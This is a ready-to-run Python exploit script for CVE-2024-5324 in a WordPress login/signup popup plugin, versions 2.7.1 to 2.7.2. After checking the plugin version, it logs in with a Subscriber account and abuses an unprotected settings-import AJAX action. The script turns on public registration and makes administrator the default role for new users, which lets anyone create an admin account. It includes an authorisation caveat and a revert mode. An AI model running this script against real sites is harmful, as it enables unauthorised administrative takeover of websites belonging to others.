#!/usr/bin/env python3
import argparse
import requests
import re
from getpass import getpass
from bs4 import BeautifulSoup
import os

## Exploit script by @RandomRobbieBF

# Optional intercepting proxy (e.g. "http://127.0.0.1:8080" for Burp). The
# value is exported for both schemes because `requests` reads the proxy
# settings from the environment; an empty string is ignored by urllib's
# proxy lookup, so the default means "connect directly".
http_proxy = ""
for _proxy_var in ("HTTP_PROXY", "HTTPS_PROXY"):
    os.environ[_proxy_var] = http_proxy

# Browser-like User-Agent sent on the login, admin-ajax and registration requests.
user_agent = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
)

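def _stable_tag(readme_text):
    """Return the value of the first ``Stable tag:`` line of a plugin readme, or None."""
    for line in readme_text.splitlines():
        if line.startswith("Stable tag:"):
            return line.partition(":")[2].strip()
    return None


def check_plugin_version(url, username, password):
    """Fingerprint the plugin from its public readme.txt and gate on the vulnerable versions.

    Fetches ``/wp-content/plugins/easy-login-woocommerce/readme.txt`` and
    reads its ``Stable tag:`` line.  Only 2.7.1 and 2.7.2 are in the affected
    range (see DESCRIPTION); any other outcome -- plugin absent, no version
    line, version outside the range, or a network error -- prints a message
    and exits the process with status 1 so the exploit is never attempted.

    ``username`` and ``password`` are accepted for signature compatibility
    with the other steps but are not used: the readme is world-readable.

    Returns:
        The version string when it is one of the vulnerable versions.

    Raises:
        SystemExit: on every non-vulnerable / error outcome (status 1).
    """
    vulnerable_versions = ("2.7.1", "2.7.2")
    plugin_url = f"{url}/wp-content/plugins/easy-login-woocommerce/readme.txt"

    # NOTE(security): TLS verification is disabled for this one request only
    # (the login and admin-ajax requests in the other functions verify
    # certificates).  Acceptable against a lab target with a self-signed
    # certificate, but it also lets an on-path attacker serve a fake readme;
    # and a self-signed target will still fail later at login.
    try:
        response = requests.get(
            plugin_url,
            headers={"User-Agent": user_agent},
            verify=False,
            timeout=30,
        )
    except requests.exceptions.RequestException as e:
        print(f"Request failed with an error: {e}")
        raise SystemExit(1)

    if response.status_code != 200:
        print("Plugin not installed")
        raise SystemExit(1)

    version = _stable_tag(response.text)
    if version is None:
        print("Failed to find the version information in the readme.txt file.")
        raise SystemExit(1)

    if version not in vulnerable_versions:
        print(f"The plugin version is {version}")
        raise SystemExit(1)

    print(f"The plugin version is {version}.")
    return version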



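def _wp_login(url, username, password):
    """Authenticate against ``wp-login.php`` and return the Session, or None on failure.

    WordPress answers a wrong password with HTTP 200 and an error form, so
    ``raise_for_status()`` cannot detect a failed login; the presence of a
    ``wordpress_logged_in*`` cookie in the session jar is the signal used.
    Network errors propagate as ``requests.exceptions.RequestException``.
    """
    session = requests.Session()
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{url}/wp-admin/",
    }
    response = session.post(
        f"{url}/wp-login.php", data=login_data, headers={"User-Agent": user_agent}
    )
    response.raise_for_status()
    if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
        return session
    return None


def _import_settings(session, url, import_json):
    """POST *import_json* to the plugin's ``xoo_admin_settings_import`` AJAX action.

    Per the CVE description the handler has no capability check, so any
    authenticated user can push option values through it.  The nonce field is
    sent empty exactly as the original PoC does (presumably it is not
    enforced server-side -- the PoC relies on that).  A 200 here only means
    admin-ajax answered; the response body is not parsed, so callers must
    verify the effect separately (they check the registration page).

    Returns the Response; raises ``requests.exceptions.HTTPError`` on 4xx/5xx.
    """
    payload = {
        "action": "xoo_admin_settings_import",
        "xoo_ff_nonce": "",
        "import": import_json,
        "slug": "easy-login-woocommerce",
    }
    response = session.post(
        f"{url}/wp-admin/admin-ajax.php",
        data=payload,
        headers={"User-Agent": user_agent, "X-Requested-With": "XMLHttpRequest"},
    )
    response.raise_for_status()
    return response


def _registration_open(url):
    """Return True when the public registration form is served.

    Deliberately unauthenticated: the question is whether *anyone* can now
    register.  The check is a string match on the English WordPress
    template, so non-English sites need a manual look.
    """
    response = requests.get(
        f"{url}/wp-login.php?action=register", headers={"User-Agent": user_agent}
    )
    return "Registration confirmation will be emailed to you" in response.text


def fixvul(url, username, password):
    """Revert the exploit: registration off, default role back to ``subscriber``.

    Caveats a cleanup must know about: this writes WordPress' *defaults*,
    not the values the site had before ``vulncheck`` ran (a site that
    legitimately allowed registration will have it switched off), and it
    does not delete any administrator account registered in the meantime --
    remove that by hand.

    Exits with status 1 on login failure, a non-200 admin-ajax reply, or when
    the registration page still serves the open-registration form.  Network
    errors are reported and swallowed.
    """
    print("Vulnerability check:", url)
    main_url = f"{url}/wp-admin/admin-ajax.php"
    try:
        session = _wp_login(url, username, password)
        if session is None:
            print("Failed to login")
            raise SystemExit(1)
        print("Logged in successfully.")

        response = _import_settings(
            session,
            url,
            '{"users_can_register":"0","default_role":"subscriber"}',
        )
        # raise_for_status() already rejected 4xx/5xx; anything else that is
        # not a plain 200 is still treated as failure, as in the original.
        if response.status_code != 200:
            print(f"Failed to set option: {main_url}")
            raise SystemExit(1)
        print(f"Option set successfully: {main_url}")

        if _registration_open(url):
            print("Failed to Reset Permissions")
            raise SystemExit(1)
        print("Options reset to default")
    except requests.exceptions.RequestException as e:
        print(f"Request failed with an error: {e}")


def vulncheck(url, username, password):
    """Exploit CVE-2024-5324: open registration and make new users administrators.

    Logs in as any user (Subscriber is enough), pushes
    ``users_can_register=1`` / ``default_role=administrator`` through the
    unprotected import action, then confirms with an unauthenticated request
    to the registration page.  This is destructive on the target -- run only
    against systems you are authorised to test, and run ``fixvul`` (and
    delete the registered admin) afterwards.

    Exits with status 1 on login failure or a non-200 admin-ajax reply.
    Network errors are reported and swallowed.
    """
    print("Vulnerability check:", url)
    main_url = f"{url}/wp-admin/admin-ajax.php"
    try:
        session = _wp_login(url, username, password)
        if session is None:
            print("Failed to log in.")
            raise SystemExit(1)
        print("Logged in successfully.")

        response = _import_settings(
            session,
            url,
            '{"users_can_register":"1","default_role":"administrator"}',
        )
        if response.status_code != 200:
            print(f"Failed to set option: {main_url}")
            raise SystemExit(1)
        print(f"Option set successfully: {main_url}")

        if _registration_open(url):
            print("You can now register a user on as an admin dont forget to set a fix once you have made an admin account")
            return
        # Registration page did not match the English template: either the
        # import silently failed or the site is localised.
        print("boooo")
        print("If the site is not in english you might have to manually check it has worked.")
    except requests.exceptions.RequestException as e:
        print(f"Request failed with an error: {e}")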


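# Vulnerability description, shown as the argparse help text.
DESCRIPTION = """
CVE-2024-5324 Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - Missing Authorization to Arbitrary Options Update
Description:
The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the import_settings function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.
"""


# Command-line interface: target URL plus the low-privilege WordPress
# credentials used for the authenticated request.
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-un", "--username", help="WordPress username (prompted for if omitted)")
# Passing the password on the command line leaks it into shell history and
# the process list; omit it and use the prompt below instead.
parser.add_argument("-p", "--password", help="WordPress password (prompted for if omitted)")
# `nargs="?"` + `const=True` lets a bare `-f`/`--fix` work while still
# accepting the old `--fix <anything>` form (the original required a value).
parser.add_argument(
    "-f", "--fix", nargs="?", const=True, default=False,
    help="Undo Admin and Reg enablement",
)
args = parser.parse_args()

# The request builders append "/wp-login.php" etc., so a trailing slash on
# the URL would produce "//wp-login.php".
args.url = args.url.rstrip("/")

# Prompt for whatever credential was not supplied; the login needs both.
if not args.username:
    args.username = input("Enter the WordPress username: ")
if not args.password:
    args.password = getpass("Enter the WordPress password: ")


# Version gate first (exits on anything outside 2.7.1-2.7.2), then either
# revert a previous run or perform the exploit.
check_plugin_version(args.url, args.username, args.password)
if args.fix:
    fixvul(args.url, args.username, args.password)
else:
    vulncheck(args.url, args.username, args.password)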